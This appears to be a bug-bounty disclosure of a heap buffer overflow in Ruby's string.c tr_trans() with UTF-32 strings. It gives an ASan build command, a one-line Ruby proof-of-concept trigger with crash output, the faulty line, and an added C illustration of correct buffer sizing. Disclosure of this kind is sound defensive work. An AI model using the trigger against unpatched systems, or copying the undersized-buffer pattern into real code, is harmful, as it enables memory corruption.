Heap corruption in string.c tr_trans() due to undersized buffer

Disclosed: 2016-06-21 00:57:04 By guido To ruby
Vulnerability Details
(originally sent by e-mail on 6 Jun 2016)

Configure with ASAN (AddressSanitizer):

```sh
mkdir install; CFLAGS="-fsanitize=address" ./configure --disable-install-doc --disable-install-rdoc --disable-install-capi -prefix=`realpath ./install` && make -j4 && make install
```

Then execute:

```
$ ./ruby -e '"a".encode("utf-32").tr("b".encode("utf-32"), "c".encode("utf-32"))'
=================================================================
==17122==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000014a98 at pc 0x7ff04065cf01 bp 0x7ffdfe7629b0 sp 0x7ffdfe7629a8
WRITE of size 4 at 0x602000014a98 thread T0
...
...
```

The actual corruption occurs here:

```c
6196 TERM_FILL(t, rb_enc_mbminlen(enc));
```

Guido
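The sizing mistake behind the trace above, shown as a constructed C illustration (added here, not Ruby's string.c): a result buffer sized for the payload alone versus one that reserves the encoding's mbminlen-byte terminator, with a bounds-checked stand-in for TERM_FILL. The helper names and the 4-byte UTF-32 terminator are assumptions for the example.

```c
#include <stdlib.h>
#include <string.h>

/* Constructed illustration of the bug class in the report, not Ruby's string.c.
 * tr_trans() builds the translated string in a heap buffer and finishes with
 * TERM_FILL(t, rb_enc_mbminlen(enc)): a terminator of mbminlen zero bytes,
 * 4 for UTF-32. A buffer sized for the payload alone cannot hold it. */

/* Sizing as the report describes it (payload only) versus the sizing that
 * also reserves room for the encoding's terminator. */
size_t buf_size_undersized(size_t payload_len, size_t termlen) { (void)termlen; return payload_len; }
size_t buf_size_fixed(size_t payload_len, size_t termlen) { return payload_len + termlen; }

/* Bounds-checked replacement for a bare TERM_FILL: writes the terminator only
 * if `termlen` bytes fit after the payload inside an allocation of `cap`
 * bytes. Returns 0 on success, -1 if the write would overrun. */
int term_fill_checked(char *buf, size_t cap, size_t payload_len, size_t termlen)
{
    if (termlen > cap || payload_len > cap - termlen) return -1;
    memset(buf + payload_len, 0, termlen);
    return 0;
}

/* Build a copy of `src` (identity translation) in a `cap`-byte buffer and
 * terminate it. Returns 0 and sets *out (caller frees) if everything fits,
 * -1 if the terminator would have overflowed the allocation. */
int translate_copy(const char *src, size_t payload_len, size_t cap, size_t termlen, char **out)
{
    char *buf = malloc(cap ? cap : 1);
    if (!buf) return -1;
    if (term_fill_checked(buf, cap, payload_len, termlen) != 0) { free(buf); return -1; }
    memcpy(buf, src, payload_len); /* terminator already in place past the payload */
    *out = buf;
    return 0;
}

/* The report's scenario, "a" in UTF-32, under one sizing policy. Returns 1 if
 * the copy was built with its 4-byte terminator inside the allocation. */
int utf32_scenario(int use_fixed)
{
    static const char a_utf32[4] = { 0, 0, 0, 'a' }; /* constructed UTF-32BE "a" */
    size_t termlen = 4; /* what rb_enc_mbminlen() returns for UTF-32 */
    size_t cap = use_fixed ? buf_size_fixed(4, termlen) : buf_size_undersized(4, termlen);
    char *out = NULL;
    if (translate_copy(a_utf32, 4, cap, termlen, &out) != 0) return 0;
    int ok = memcmp(out + 4, "\0\0\0\0", 4) == 0;
    free(out);
    return ok;
}
```

With the payload-only sizing the checked fill refuses the write; the unchecked original performs it, which is the 4-byte WRITE ASan flags.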
Report Stats
  • Report ID: 144485
  • State: Closed
  • Substate: informative
  • Upvotes: 2